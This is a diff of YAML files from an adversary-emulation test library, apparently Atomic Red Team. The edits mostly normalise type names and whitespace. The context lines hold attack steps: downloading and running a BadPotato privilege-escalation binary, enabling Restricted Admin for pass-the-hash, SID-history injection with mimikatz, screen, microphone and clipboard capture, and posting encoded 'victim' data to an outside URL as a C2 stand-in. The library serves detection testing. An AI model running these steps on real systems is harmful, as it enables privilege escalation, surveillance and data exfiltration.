reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /f >nul 2>&1
name: command_prompt
elevation_required: true
elevation_required: true
- name: Activate Windows NoSetTaskbar Group Policy Feature
auto_generated_guid: d29b7faf-7355-4036-9ed3-719bd17951ed
description: |
@@ -622,8 +622,8 @@ atomic_tests:
- name: Ursnif Malware Registry Key Creation
auto_generated_guid: c375558d-7c25-45e9-bd64-7b23a97c1db0
description: |
Ursnif downloads additional modules from the C&C server and saves these in the registry folder HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\
More information - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/
Ursnif downloads additional modules from the C&C server and saves these in the registry folder HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\
More information - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/
supported_platforms:
- windows
executor:
@@ -636,7 +636,7 @@ atomic_tests:
- name: Terminal Server Client Connection History Cleared
auto_generated_guid: 3448824b-3c35-4a9e-a8f5-f887f68bea21
description: |
The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe) saves the remote computer name (or IP address) and the username that is used to login after each successful connection to the remote computer
The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe) saves the remote computer name (or IP address) and the username that is used to login after each successful connection to the remote computer
supported_platforms:
- windows
dependency_executor_name: powershell
@@ -696,7 +696,7 @@ atomic_tests:
auto_generated_guid: fe7974e5-5813-477b-a7bd-311d4f535e83
description: |
Enabling Restricted Admin Mode via Command_Prompt,enables an attacker to perform a pass-the-hash attack using RDP.
See [Passing the Hash with Remote Desktop](https://www.kali.org/blog/passing-hash-remote-desktop/)
supported_platforms:
- windows
@@ -734,4 +734,4 @@ atomic_tests:
cleanup_command: |
reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /f >nul 2>&1
name: command_prompt
elevation_required: true
elevation_required: true
atomics/T1113/T1113.yaml
+10 -10
View File
@@ -10,7 +10,7 @@ atomic_tests:
input_arguments:
output_file:
description: Output file path
type: Path
type: path
default: /tmp/T1113_desktop.png
executor:
command: |
@@ -27,7 +27,7 @@ atomic_tests:
input_arguments:
output_file:
description: Output file path
type: Path
type: path
default: /tmp/T1113_desktop.png
executor:
command: |
@@ -44,15 +44,15 @@ atomic_tests:
input_arguments:
output_file:
description: Output file path
type: Path
type: path
default: /tmp/T1113_desktop.xwd
package_checker:
description: Package checking command for linux. Debian system command- dpkg -s x11-apps
type: String
type: string
default: rpm -q xorg-x11-apps
package_installer:
description: Package installer command for linux. Debian system command- apt-get install x11-apps
type: String
type: string
default: yum install -y xorg-x11-apps
dependency_executor_name: bash
dependencies:
@@ -78,7 +78,7 @@ atomic_tests:
input_arguments:
output_file:
description: Output file path
type: Path
type: path
default: /tmp/T1113_desktop.png
dependencies:
- description: |
@@ -98,15 +98,15 @@ atomic_tests:
description: |
Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour
supported_platforms:
- windows
- windows
input_arguments:
output_file:
description: Output file path
type: Path
type: path
default: c:\temp\T1113_desktop.zip
recording_time:
description: Time to take screenshots
type: String
type: string
default: 5
executor:
name: powershell
@@ -129,7 +129,7 @@ atomic_tests:
input_arguments:
output_file:
description: Path where captured results will be placed
type: Path
type: path
default: $env:TEMP\T1113.png
executor:
command: |
atomics/T1114.001/T1114.001.yaml
+2 -3
View File
@@ -13,11 +13,11 @@ atomic_tests:
input_arguments:
output_file:
description: Output file path
type: String
type: string
default: $env:TEMP\mail.csv
file_path:
description: File path for Get-Inbox.ps1
type: String
type: string
default: PathToAtomicsFolder\T1114.001\src
dependency_executor_name: powershell
dependencies:
@@ -33,4 +33,3 @@ atomic_tests:
cleanup_command: |
Remove-Item #{output_file} -Force -ErrorAction Ignore
name: powershell
atomics/T1114.003/T1114.003.yaml
+6 -6
View File
@@ -10,19 +10,19 @@ atomic_tests:
input_arguments:
username:
description: office-365 username
type: String
default: null
type: string
default:
password:
description: office-365 password
type: String
default: null
type: string
default:
rule_name:
description: email rule name
type: String
type: string
default: "Atomic Red Team Email Rule"
forwarding_email:
description: destination email addresses
type: String
type: string
default: "Atomic_Operator@fakeemail.aq"
dependency_executor_name: powershell
dependencies:
atomics/T1115/T1115.yaml
+2 -2
View File
@@ -45,7 +45,7 @@ atomic_tests:
input_arguments:
ms_product:
description: Maldoc application Word
type: String
type: string
default: Word
dependency_executor_name: powershell
dependencies:
@@ -80,4 +80,4 @@ atomic_tests:
apt install xclip -y
history | tail -n 30 | xclip -sel clip
xclip -o > history.txt
name: sh
name: sh
atomics/T1123/T1123.yaml
+8 -8
View File
@@ -29,26 +29,26 @@ atomic_tests:
- name: using Quicktime Player
auto_generated_guid: c7a0bb71-70ce-4a53-b115-881f241b795b
description: |
Use AppleScript to get Quicktime Player to record an audio file from the default microphone.
Use AppleScript to get Quicktime Player to record an audio file from the default microphone.
Should create a non-empty m4a file with sound from the microphone.
Should create a non-empty m4a file with sound from the microphone.
- requires Automation permissions but no additional microphone permissions
- saves file in /tmp by default. Other locations likely to require more permissions.
- requires Automation permissions but no additional microphone permissions
- saves file in /tmp by default. Other locations likely to require more permissions.
supported_platforms:
- macos
input_arguments:
filename:
description: Location of the script
type: Path
type: path
default: PathToAtomicsFolder/T1123/src/T1123.sh
audiofile:
description: Location of the recorded audio file
type: Path
type: path
default: /tmp/T1123.m4a
duration:
description: Length of recording to make in seconds
type: Integer
type: integer
default: 5
executor:
command: |
@@ -57,4 +57,4 @@ atomic_tests:
if test -w #{audiofile}; then
rm #{audiofile}
fi
name: sh
name: sh
atomics/T1124/T1124.yaml
+2 -2
View File
@@ -10,7 +10,7 @@ atomic_tests:
input_arguments:
computer_name:
description: computer name to query
type: String
type: string
default: localhost
executor:
command: |
@@ -32,7 +32,7 @@ atomic_tests:
description: |
Identify system time. Upon execution, the local computer system time and timezone will be displayed.
supported_platforms:
- macos
- macos
executor:
command: |
date
atomics/T1127.001/T1127.001.yaml
+7 -7
View File
@@ -10,15 +10,15 @@ atomic_tests:
input_arguments:
filename:
description: Location of the project file
type: Path
type: path
default: PathToAtomicsFolder\T1127.001\src\T1127.001.csproj
msbuildpath:
description: Default location of MSBuild
type: Path
type: path
default: C:\Windows\Microsoft.NET\Framework\v4.0.30319
msbuildname:
description: Default name of MSBuild
type: Path
type: path
default: msbuild.exe
dependency_executor_name: powershell
dependencies:
@@ -43,15 +43,15 @@ atomic_tests:
input_arguments:
filename:
description: Location of the project file
type: Path
type: path
default: PathToAtomicsFolder\T1127.001\src\vb.xml
msbuildpath:
description: Default location of MSBuild
type: Path
type: path
default: C:\Windows\Microsoft.NET\Framework\v4.0.30319
msbuildname:
description: Default name of MSBuild
type: Path
type: path
default: msbuild.exe
dependency_executor_name: powershell
dependencies:
@@ -65,4 +65,4 @@ atomic_tests:
executor:
command: |
#{msbuildpath}\#{msbuildname} #{filename}
name: command_prompt
name: command_prompt
atomics/T1127/T1127.yaml
+7 -7
View File
@@ -12,15 +12,15 @@ atomic_tests:
input_arguments:
filename:
description: Location of the project file
type: Path
type: path
default: PathToAtomicsFolder\T1127\src\hello.js
jscpath:
description: Default location of jsc.exe
type: Path
type: path
default: C:\Windows\Microsoft.NET\Framework\v4.0.30319
jscname:
description: Default name of jsc
type: Path
type: path
default: jsc.exe
dependency_executor_name: powershell
dependencies:
@@ -51,15 +51,15 @@ atomic_tests:
input_arguments:
filename:
description: Location of the project file
type: Path
type: path
default: PathToAtomicsFolder\T1127\src\LibHello.js
jscpath:
description: Default location of jsc.exe
type: Path
type: path
default: C:\Windows\Microsoft.NET\Framework\v4.0.30319
jscname:
description: Default name of jsc
type: Path
type: path
default: jsc.exe
dependency_executor_name: powershell
dependencies:
@@ -77,4 +77,4 @@ atomic_tests:
cleanup_command: |
del %TEMP%\LibHello.js
del %TEMP%\LibHello.dll
name: command_prompt
name: command_prompt
atomics/T1132.001/T1132.001.yaml
+5 -5
View File
@@ -11,11 +11,11 @@ atomic_tests:
input_arguments:
destination_url:
description: Destination URL to post encoded data.
type: Url
type: url
default: redcanary.com
base64_data:
description: Encoded data to post using fake Social Security number 111-11-1111.
type: String
type: string
default: MTExLTExLTExMTE=
executor:
command: |
@@ -32,15 +32,15 @@ atomic_tests:
input_arguments:
destination_url:
description: Destination URL to post encoded data.
type: Url
type: url
default: example.com
plaintext:
description: Plain text mimicking victim data sent to C2 server.
type: String
type: string
default: Path\n----\nC:\Users\victim
key:
description: XOR key used for encoding the plaintext.
type: String
type: string
default: abcdefghijklmnopqrstuvwxyz123456
executor:
command: |
atomics/T1133/T1133.yaml
+15 -16
View File
@@ -1,6 +1,5 @@
---
attack_technique: T1133
display_name: External Remote Services
attack_technique: T1133
display_name: External Remote Services
atomic_tests:
- name: Running Chrome VPN Extensions via the Registry 2 vpn extension
@@ -8,29 +7,29 @@ atomic_tests:
description: |
Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list
supported_platforms:
- windows
- windows
input_arguments:
chrome_url:
description: chrome installer download URL
type: Url
type: url
default: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe
extension_id:
description: chrome extension id
type: String
default: |
type: string
default: |
"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme"
dependency_executor_name: powershell
dependencies:
- description: |
Chrome must be installed
prereq_command: 'if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}'
get_prereq_command: |
Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url}
Start-Process $env:temp\ChromeStandaloneSetup64.exe /S
dependencies:
- description: |
Chrome must be installed
prereq_command: 'if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}'
get_prereq_command: |
Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url}
Start-Process $env:temp\ChromeStandaloneSetup64.exe /S
executor:
name: powershell
elevation_required: true
command: |
command: |
$extList = #{extension_id}
foreach ($extension in $extList) {
New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force
@@ -38,7 +37,7 @@ atomic_tests:
Start chrome
Start-Sleep -Seconds 30
Stop-Process -Name "chrome"
cleanup_command: |
cleanup_command: |
$extList = #{extension_id}
foreach ($extension in $extList) {
Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -ErrorAction Ignore}
atomics/T1134.001/T1134.001.yaml
+11 -11
View File
@@ -39,7 +39,7 @@ atomic_tests:
input_arguments:
nsudo_path:
description: 'Path to the NSudo bat file'
type: Path
type: path
default: $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher\x64\NSudoLG.exe
dependency_executor_name: powershell
dependencies:
@@ -54,9 +54,9 @@ atomic_tests:
Remove-Item $env:TEMP\NSudo_8.2_All_Components.zip -Recurse -ErrorAction Ignore
executor:
command: |
Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd"
Start-Sleep -Second 5
Stop-Process -Name "cmd" -force -erroraction silentlycontinue
Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd"
Start-Sleep -Second 5
Stop-Process -Name "cmd" -force -erroraction silentlycontinue
name: powershell
- name: Bad Potato
auto_generated_guid: 9c6d799b-c111-4749-a42f-ec2f8cb51448
@@ -66,7 +66,7 @@ atomic_tests:
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
dependencies:
- description: |
BadPotato.exe must exist in the temp directory
prereq_command: |
@@ -75,12 +75,12 @@ atomic_tests:
Invoke-WebRequest -OutFile $env:TEMP\BadPotato.exe "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/bin/BadPotato.exe?raw=true"
executor:
command: |
cd $env:temp
Start-Process .\BadPotato.exe notepad.exe
Start-Sleep -Second 20
Stop-Process -Name "notepad" -force -erroraction silentlycontinue
Stop-Process -Name "BadPotato" -force -erroraction silentlycontinue
cd $env:temp
Start-Process .\BadPotato.exe notepad.exe
Start-Sleep -Second 20
Stop-Process -Name "notepad" -force -erroraction silentlycontinue
Stop-Process -Name "BadPotato" -force -erroraction silentlycontinue
cleanup_command: |
taskkill /f /im notepad.exe
name: powershell
elevation_required: true
elevation_required: true
atomics/T1134.004/T1134.004.yaml
+15 -15
View File
@@ -14,23 +14,23 @@ atomic_tests:
input_arguments:
parent_process_name:
description: Name of the parent process
type: String
type: string
default: explorer
spawnto_process_path:
description: Path of the process to spawn
type: Path
type: path
default: C:\Program Files\Internet Explorer\iexplore.exe
dll_process_name:
description: Name of the created process from the injected dll
type: String
type: string
default: calculator
dll_path:
description: Path of the dll to inject
type: Path
type: path
default: PathToAtomicsFolder\T1134.004\bin\calc.dll
spawnto_process_name:
description: Name of the process to spawn
type: String
type: string
default: iexplore
dependency_executor_name: powershell
dependencies:
@@ -65,15 +65,15 @@ atomic_tests:
input_arguments:
file_path:
description: File path or name of process to spawn
type: Path
type: path
default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe
parent_pid:
description: PID of process to spawn from
type: String
type: string
default: $PID
command_line:
description: Specified command line to use
type: String
type: string
default: -Command Start-Sleep 10
dependencies:
- description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
@@ -94,11 +94,11 @@ atomic_tests:
input_arguments:
parent_pid:
description: PID of process to spawn from
type: String
type: string
default: $PID
test_guid:
description: Defined test GUID
type: String
type: string
default: 12345678-1234-1234-1234-123456789123
dependencies:
- description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
@@ -119,11 +119,11 @@ atomic_tests:
input_arguments:
command_line:
description: Specified command line to use
type: String
type: string
default: -Command Start-Sleep 10
file_path:
description: File path or name of process to spawn
type: Path
type: path
default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe
dependencies:
- description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
@@ -144,15 +144,15 @@ atomic_tests:
input_arguments:
command_line:
description: Specified command line to use
type: String
type: string
default: -Command Start-Sleep 10
file_path:
description: File path or name of process to spawn
type: Path
type: path
default: $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe
parent_name:
description: Parent process to spoof from
type: Path
type: path
default: $Env:windir\System32\notepad.exe
dependencies:
- description: The AtomicTestHarnesses module must be installed and Start-ATHProcessUnderSpecificParent must be exported in the module.
atomics/T1134.005/T1134.005.yaml
+4 -4
View File
@@ -6,19 +6,19 @@ atomic_tests:
description: |
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. Must be run on domain controller
supported_platforms:
- windows
- windows
input_arguments:
sid_to_inject:
description: SID to inject into sidhistory
type: String
type: string
default: S-1-5-21-1004336348-1177238915-682003330-1134
sam_account_name:
description: Target account to modify
type: String
type: string
default: '$env:username'
mimikatz_path:
description: Mimikatz windows executable
type: Path
type: path
default: '$env:TEMP\mimikatz\x64\mimikatz.exe'
dependency_executor_name: powershell
dependencies:
atomics/T1135/T1135.yaml
+5 -5
View File
@@ -10,7 +10,7 @@ atomic_tests:
input_arguments:
computer_name:
description: Computer name to find a mount on.
type: String
type: string
default: computer1
executor:
command: |
@@ -27,11 +27,11 @@ atomic_tests:
input_arguments:
package_checker:
description: Package checking command. Debian - dpkg -s samba
type: String
type: string
default: (rpm -q samba &>/dev/null) || (dpkg -s samba | grep -q installed)
package_installer:
description: Package installer command. Debian - apt install samba
type: String
type: string
default: (which yum && yum -y install epel-release samba)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y samba)
dependency_executor_name: bash
dependencies:
@@ -56,7 +56,7 @@ atomic_tests:
input_arguments:
computer_name:
description: Computer name to find a mount on.
type: String
type: string
default: localhost
executor:
command: |
@@ -109,7 +109,7 @@ atomic_tests:
input_arguments:
parameters:
description: ShareFinder parameter
type: String
type: string
default: -CheckShareAccess
dependencies:
- description: Invoke-ShareFinder module must exist in %TEMP% directory

Some files were not shown because too many files have changed in this diff Show More